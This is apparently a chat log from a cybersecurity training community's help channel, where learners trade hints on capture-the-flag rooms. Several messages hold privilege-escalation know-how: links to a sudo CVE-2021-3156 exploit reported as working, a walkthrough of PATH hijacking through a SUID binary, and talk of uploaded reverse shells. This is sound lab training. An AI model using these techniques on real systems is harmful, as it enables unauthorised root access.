thanks anyway

I'll keep digging

I tried to solve it in #bot-commands

the password might be empty?

that's exactly what give me my john

however, this seems not to be the right answer

yeh just cracked it on https://crackstation.net/

no way

i tried CS

only the latter part gives a valid answer ffb43f0de35be4d9917ac0cc8ad57f8d

-.-

awwww

thanks man

No problem, it was fun!

Did anyone completed the room Phishing mails 1??

Im stuck at question first of task-6 and i have no idea

Got it from different room

Good evening everyone

am new here, please where will I start

#start-here

hi i dont understand task 7 linux fundementals part 1

what have you tried????

Or what don't you understand about it

i dont understand the whole task

They are operators that you can use in a terminal along with your commands to achieve different things

Think of it as in the English language

There are sentences(commands) which communicate your ideas

And then there are symbols like , or ; which can joint those different sentences (operators)

For example I could say I walked, then I ran

Which would be the code equivalent of echo 'hello' > Textfile.txt

ah i understand

Anyone solve CCT2019 Task4?

is that the openvpn room, or are you asking about running openvpn?

heh, figured it out?

so, yeah, i normally have openvpn running in one tab on my terminal, and then do stuff in other tabs

so, presuming you're on linux you run "sudo openvpn thisisyouropenvpnfilename.ovpn"

not on linux

i am on windwows

windowsd

windows

sorry for my impatience

i realise im annoying

ah ok, i'd recommend you try downloading virtualbox and get a kali vm running in it. it'll make your life easier going forwards 🙂

any tutorial u know of?

like where do i learn how to do that stuff

khalas nvm

ill search it

sorry for bothering u

have a goodday

ciao

I had problems realizing what openvpn does as well, at the core when you start a room it will let you visit the IP on your active machine and do the task from there

And then you would use your own computer to do the task rather than open up an attack box each time

wdym by 'at the core'

Basically

but i dont get it

Fundamentally

Essentially

not that

hahahah

What don't you get about it?

i have openvpn openned ok?

i imported th.ovpn file

and connected it

i started the machine on the website

then

it asked me to try linux commands on my end

and i cant access the terminal

and idk why

Oh for that you need your own virtual machine with a Linux system

Because it's a different operating system with different commands

How much RAM do you have?

Hey hey, I am currently doing Network Service 2 and Task 4 is not quite working for me. I get an error when doing ./bash -p

./bash: line 1: syntax error near unexpected token 'newline'

./bash: line 1: '<!DOCTYPE html>'

4

You downloaded a website and not the file

cant switch os

have to stay on windows

big oof... thanks

Gave +1 Rep to @versed shadow

already using so much ram

so its too low for a vm

as in here, i can do none of that, right?

since i cant deploy the linux machine

Don't you have an AttackBox there?

omg

you're right

im such an idiotttt

i just realised

i wasted so much time

thank u so much

another quick question. Doesn't the kali machine come with John the ripper?

The vm or the browser based Kali box?

the browser one

It should do, but I can't be certain as the kali one hasn't been updated in 2 years.

The attackbox has John though.

okay :) thanks, will use that one from now on!

I'm in the Phishing Emails 1 room on the last task before the conclusion and can't for the life of me figure out what they want for "What trusted entity is this email masquerading as?". I know I'm thinking too hard -- any hints? It's making me crazeee

like for example the email trys to make it seem it comes from Amazon

when it is really coming from somewhere else

Hmm I see what it looks like to me but it doesn't fit the answer spaces/asterisks. I'll keep fiddling with it...

I suppose I am blind, I still don't see what it could be. The answer space isn't laid out like a domain -- it's two words and it makes zero sense to me with what I see in the email3.eml file. Any help is appreciated, thanks.

@undone quail which section in the email3.eml do you think should be containing the answer to this question?

I would imagine in the header somewhere but I've looked through the whole thing and unless it's encoded somewhere, I just don't see it...

it is encoded.

You could also open the email in Thunderbird?

Alrighty I'll try to decode everything haha

try looking in a section that tells you about the email sender ;)

Ah man I opened it with Thunderbird and it was right in my face. Thanks affinity!!

Thanks Sarthak I got it!

Hello there after connecting to an ssh server I arrived directly on an irb prompt and I have to leave it, but if I do CTRL-D or if I type exit it takes me out of the ssh server, any tips on this ?

You should add the room and the task you are doing.

Hello, I'm currently going throw the Network Services Room and hanging at Task 4, the last question. I am not able to log in only via the RSA-Key. It also requests a password. Can someone help me logging in ? The password is not just empty.

If you are sure that you specified the id_rsa in your ssh command correctly, you have to use the correct username to ssh with, if you are using the wrong username it's asking for a password.

How do I specify the id_rsa in my ssh command ? It did it just like in the writeup

Let me know what's the full command you used and I'll tell you if it's the right way

ssh cactus@10.10.144.69

Ok, then you are not specifying the key file in your command. To do that you have to use -i id_rsa in your command, if the id_rsa is in the same directory where you run the command from

If the id_rsa is not in the same directory you have to specify the path to the file like -i /home/tryhackme/id_rsa for example

Ahh, nice. It worked now. Was a bit confused because it's not mentioned in the Writeup. Thank you so much !

Hello, I have an issue in the room "fun with functional" I m stuck when I upload the file in haskell but then i searched but i don't know where to look or what to do does anyone have a tips for me ?

@fair flame Can you link the room?

Also please verify so you can share a screen shot where you're stuck.

!docs verify

Can anyone help me with the third Flag from this room: https://tryhackme.com/room/fileinc

https://tryhackme.com/room/funwithfunctional this is the room

@fair flame It's showing the room as private on my end

@wheat helm oh no its from my school if you can’t reach it I m kaput… anyway thank you for trying

Gave +1 Rep to @wheat helm

Hi everyone. I'm completely stuck on the room 'Internal'. I'm still quite a beginner but I've exhausted pretty much every idea I've had (which aren't many). I have access to the system as www-data in a simple php reverse shell. But I have no idea how I could escalate. Could somebody give me a hint as to where I'm supposed to look?

The room in question:
https://tryhackme.com/room/internal

I've been spitting through the output of linpeas.sh. And so far I've found two vulns that looked promising:
https://www.exploit-db.com/exploits/47166, which I can't get to work because the exploit needs gcc which isn't installed on the system
https://www.exploit-db.com/exploits/49521, No idea what I'm doing wrong with this one

never did this room, but u could try this https://github.com/worawit/CVE-2021-3156

Thanks for the tip! I'll check it out

Omg this worked like a charm. Problem is. Once you get the escalated shell, you don't get a prompt. So I've been waiting for that script to finish for a bit now. While in fact is was already finished lmao

prompt is #

Ye, there wasn't anything

Hello, question about the Nessus room, task 5

which VM do they mean you have to scan?

do you have to start the machine from task 4 again?

I am currently doing the final task on Upload Vulnerabilities
I got the shell uploaded and tried to execute it via the admin page. The page loads for a while and then states the module was not found. I have nc running and configured the shell correctly I think. Anything I might have missed?

I am in Network services and stuck on Task 4 -
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

Is there someone who can help me with cybercrafted? I found the ssh private key, cracked it but still can't log into ssh?

Got it?

nope

Hint: Then "get" it
Spoiler: ||Download the .txt file you found and "cat" it||

@white salmon thanks will give that a go when I get back there - my machine ran out of time for now - I try cat on it but had not downloaded first

Gave +1 Rep to @versed shadow

God I just finished the room the exact same way, somehow it feels that this is not the expected way of solving the room tho...

I thought so too, but it worked none the less. I still learned a lot about enumeration so I think it was worth :D

One thing important for the room Cross-site Scripting is that you must be login first to solve the question or it won't give you flag.

Anyone available to assist with easy room "Easy Peasy"?

Kinda stuck here: What is the password to login to the machine via SSH?
||I found the image and cracked the Gost hash. However, when I use Steghide and try to extract the content of the picture, the passphrase isnt working.||

I figured it out. I downloaded the wrong picture from the page. There are two pictures and I needed to use the one called ||binarycodepixabay.jpg||

Are you on the attackbox or your own machine ?

Can you open 10.10.10.10 in your machines browser ?

If you check ip a s do you only see a tun0 interface or any extra like tun1, tun2 etc ?

Did you ever receive a rev shell on your machine ?

I mean, maybe you always used the attackbox and that's the first time you use your local machine as attacking machine and therefore never catched a rev shell on your local machine previously ?

Mh, maybe check your uploaded rev shell IP and port if they match your tun0 IP and listening port

Also you could check sudo ufw status if there might be a firewall active

Hello guys, i'm looking for a hint about the Willow machine: i've enumerated the NFS shares retrieving the only available file but i'm honestly stuck..

https://tryhackme.com/room/willow

i cant verify

What does it mean when I can't ssh to a machine when it has open ssh port. It displays me error "Permission denided (publickey)"

Hey could I get a hint for the room Overpass3. I've found the backup, gotten the information from the spreadsheet and I've been able to log into ftp with paradox's account. I have no idea where to go from here, can't find any way to actually gain access to the machine.
https://tryhackme.com/room/overpass3hosting

You can do many things with ftp

Maybe try to figure out where the FTP folder is

Hello all! I feel as though I've lost my mind on a problem that shouldn't be that hard - "Authentication Bypass" module has a section for "Brute Force" in which I am required to use:

ffuf tool

I've typed the command in the terminal a few different times in order to get the valid username/password and no luck so far

I've checked, rechecked syntax and not getting results, nor am I understanding what I should do different

any help would be greatly appreciated

So you got the valid usernames already right?

In case you do, check that valid usernames file, it should only contain the usernames, 1 per line and no status codes, size or similar.

Thanks for the tip! I was able to get a revshell using php, should've been a bit more obvious for me haha. But I got stuck again after getting access to paradox's account. So I looked up a writeup (multiple actually), and it seems I overestimated my skills. This room was a bit too hard for me, so I've left it at that and I'm going to continue doing some easier ones. I did learn a lot though so it wasn't in vain 😄

Gave +1 Rep to @ripe hedge

I was able to spot the NFS exploit without a writeup though (with linpeas.sh) so I'm kinda happy about that, but I don't know much about active directory yet. So I'm going to focus on that now.

Curious, what suggested Active Directory there? There wasn't any in that box

Well, linpeas.sh gave this in it's output:

-rw-r--r--. 1 root root 54 Nov 18  2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)```

It's also very possible I'm confused as to what NFS and active directories are. But that's what I thought

Oh shit you're the guy from Overpass that keeps forgetting his password 😄

Excellent rooms, I've learned alot from them already

Yeah it's not Active Directory related

Active Directory is a lot of SMB, no NFS

Aaaah my bad, sorry

Room hint for Pickle Rick, do I need to bypass/exploit login on http://[MACHINE_IP/login.php]

You need to log in.

The box "PATH" in this room uses a compiled program called "test" that comes already on the box and doesn't say anything about the creation or a download link. In fact it's preset to run a file named "thm" that they want user to create. In order for this to be a viable method of privEsc, I was wondering if anyone knew more about where this program came from (like a site gtfobins) or does it just have to be coded as a "as needed". https://tryhackme.com/room/linprivesc#

I scp'd the file but I'm wondering if I'd actually be able to use it or not. To be 100% honest I struggled comprehending this room.. I think I got the overall gyst of things. but not sure why this program was needed..

Its purpose is to demonstrate a path exploit. You need a program that runs as root in order to exploit the path.

so in a real scenerio i would look for a suid binary such as base64 or something ??

In a more realistic scenario, you would look for a file that has those permissions.

Exactly.

ok.. makes sense.. but why wouldnt i just exploit that instead of going through all the mess of adding a $PATH variable?

If you want to learn more about path exploit, there is great room for that. It's a walkthrough room. Very well documented.

https://tryhackme.com/room/dejavu

cool.. Ill check it.. Thanks

Not every SUID is exploitable by itself. But that SUID might run a different program without specifying its path.

So you can create a fake program with an identical name that runs a shell, and since the SUID is going to run that fake program as root, you get a root shell.

But whatever I am going to tell you here, is worthless compared to that room I suggested to you :)

#general message :))

lol.. well i already now understand the point of that binary thanks to you so the room must be SWEET!! lol

.. Thanks again

Thank you

Gave +1 Rep to @versed shadow

does anyone know how to properly pull a hash from rubeus into hashcat? I feel like an idiot because I can't get hashcat to recognize the hash and I know it's an issue with formatting. What's the best practice for this?

I keep getting this issue... doing Basic Pentesting and got the first user and their password. I established an ssh connection and put linpeas on it via scp. But when running it, it does not seem to continue. I just get this... any idea why?

Report #room-bugs

or your connections has some bugs

how would I verify against connection issues? I have this problems across several rooms

Can I share a screen shot of a problem I have in linux fundementals 3 beginners
I started a http server but it is just idle
nothin is happening

I cant type anything either

I was supposed to download it using wget

!docs verify if you still want to send that screen shot

!docs verify

After you deploy the python3 server show a print screen of it. After you deploy it you need to open a new terminal and use wget.
I don't know if you can use the wget in the same terminal that you started the python3 server, at least this is how i did it, i got stuck there also...

you need new instance, on one window you run http.server on other you download the file

Or you could open the python server in the background, thought of it after i wrote the message.

Hey. I have weird problem with "Attacking Kerberos" room. One of the questions is:
What two services make up KDC?"
and the answer format is **,***

however, ||AS,TGS|| seems not to be the right answer

what do you think the probability is that it is case sensetive in the answers section????

I think I don't get your point. I've tried providing in capitals and in lowercase, also in a mix of both

do I really need to brute force it? 😄

Maybe have the first letter capitalized in each one?

@junior wave - nope

tried that too

|| AS, TGS || doesn't work?

oh damn

Maybe are a space after the second word

I didn't notice that f*cking space -.-

thanks @junior wave and sorry for bothering you guys

Gave +1 Rep to @junior wave

ok, probably that was a sign to get rest

ah yeah shadow missed that the space was missing too

😉

New to this stuff...will keep it short. Working on Network Services Enumerating Telnet. When I do a nmap scan (nmap [IP]) I'm seeing ports opened between 1-1000 and apparently I'm not supposed to in this room. It's the one where telnet is assigned to non-standard 8012. When am I doing wrong? I've used different switches but open ports are open ports.

22 open ssh
80 open http
111 open rpcbind
and 3 more

What's the nmap command you ran?

I've used:
Per directions started with: nmap -A -p- [IP]
Tried:: nmap [IP}
Did some looking and found out the port is (non-standard telnet 8012), went back to try: nmap -p 8000-8050 [IP] and didn't show that port.

I've tried resetting the attackbox also thinking something might be wrong but I get the same results. From what I see I'm showing ports open that shouldn't be and can't find the one that should be.

I've moved on to the FTP portion of that room and oddly enough I don't show FTP port 21 open either. Can't complete the room without these working. Not sure what I'm missing here. 😕

Try ||--top-ports|| command/flag

I think I figured it out. Looks like I have to close and open the Attachbox in each section (SMB, Telnet, FTP) in the Network Services room. I thought I could just use the same machine. It's working now. Thanks!

Gave +1 Rep to @junior wave

Yes you'll have to use the machine for the specific task, good job on figuring it out yourself

There is a difference between the AttackBox and the VMs used in those tasks - the AttackBox is the VM provided by THM to be your launching point for on-network activities; that's not the same thing as the target machine that you need to spawn to complete certain tasks

Congrats on mod!

upload vulnerabilities room can t access site

Hey ! small hint on how to get in influx database in sweettooth inc ?

try looking for CVEs

Yop, got it, mybad 😉

Hello i was doing the john the ripper room and i was a bit confused for the question in TASK4,question 3 where it asks the question "what is the value of the cracked hash"

I cant send a photo but i typed

"john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt"

the directory im running the command is /home/mrblue/Desktop/first_task_hashes

What is i get is

Usinh deffault input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)

SORRY FOR THE SPAM

This is very vague. You're more likely to get help if you provide detail about the problem.
#room-help message Here's a list of good questions to answer when you want help.

Can someone Help with this I am on What is Networking? and the question is What is each section of an IP address called? and i am a bit stuck on it.

Are you sure you didn't find the answer in the task? 😄

I suggest you take another look at it, but if you really want i can give you the direct answer, your choice

Please tell me i just cant find it.

||"An IP address is a set of numbers that are divided into four octets".
The answer is octet, it's right below the explanation for the IP Addresses||

Oh thank you!

welcome

Hi, am on Network Room 2 on MySQL exploit. Confused on cracking the final flag. Any hints to get it

Can i get a hint about this one its Intro To LAN and the question is What is the verb given to the job that Routers perform?

Read the text below "What is a Router?"

oh oaky thanks

Forget about my quedtion i got it

||search for mysql_hashdump||
||set options that need||
||use john the ripper to crack hash||
||ssh||

Got non related user name and cracked that user password but got confused where to look for MySql.txt

Tried runing module MySQL_Hashdumb with the new user credentials set and run it again but not getting anything

try to use find command

to find MySQL

focus on your first path in when ssh

Ok thanks

Looking for a nudge on 'VulnNet Internal' room. Captured first flag, not sure where to go for the 2nd.

i was doing unqoted service path in windows priv esec room

and whenever i place the common.exe file in the folder the defender removes it

need help

Hi! I did the room https://tryhackme.com/room/linprivesc task 9. is there anyway to know that the cron working or not? because i cannot get my simple reverse shell to be fired up

Check the permissions of the file you want cron to execute

it is -rw-r--r-- 1 karen karen 148 Jan 10 23:14 backup.sh

Right, so I guess you see the issue ?

i see. hahahaha

thanks @left thunder

Gave +1 Rep to @left thunder

work!!!

I'm doing the metasploit room, and the exploit its having you do isn't creating a session

ahh, it seems to be giving bad order of instructions

I got it to work

hi guy! I need help for the last question for this room. https://tryhackme.com/room/contiransomwarehgh. I 'am looking missing someting in the resserch or the answer form. Any Help?

Not sure what exactly the site is asking for in the new Red Team Threat Intel room. I've completed the room, but want to get the right answers for that site.

Check ||https://cybersecurityworks.com/blog/ransomware/is-conti-ransomware-on-a-roll.html||, from the #929077422601670726 room.

same like theres a huge amount of variation that could go into those correct answers so only knowing if its all or none is kind of rough

Guess we could ask @solemn smelt directly.

The task implied that you would need to get the flag to answer the question, but the question doesn't actually prompt for input. Otherwise I'd still be banging my head against the kill chain.

Hi there I have used SMB client to login as anonymous but I am having trouble accessing the text document, what am I doing wrong?

tried posting a Screenshot but I can

using command get Working From Home Information.txt

You have to verify your thm profile in discord first in order to send screenshots

!docs verify

But you have to find a way to get around the spaces in the file name. Maybe that's leading you towards it: https://stackoverflow.com/questions/12902227/how-to-input-a-path-with-a-white-space/12902280

so even if it is autocompleting the name of the item it still doesnt work?

If it's not auto completing it the way it needs to be to get around the spaces, then no.

thank you @left thunder I appreciate the nudge

Gave +1 Rep to @left thunder

i don't understand this question

its in nessus thm room

What Apache HTTP Server Version is reported by Nessus?

task 4 question 3

ok task 7 in the new red team thread intel room is really badly made. It is just a lot af trial and error 😕

The static site doesn't give a lot of direction, but the questions that actually need answering are pretty straight-forward with the provided MITRE link.

yes its just the static site thing

The LOLBAS question did take a bit more digging, but the rest weren't too hard to find.

rest are easy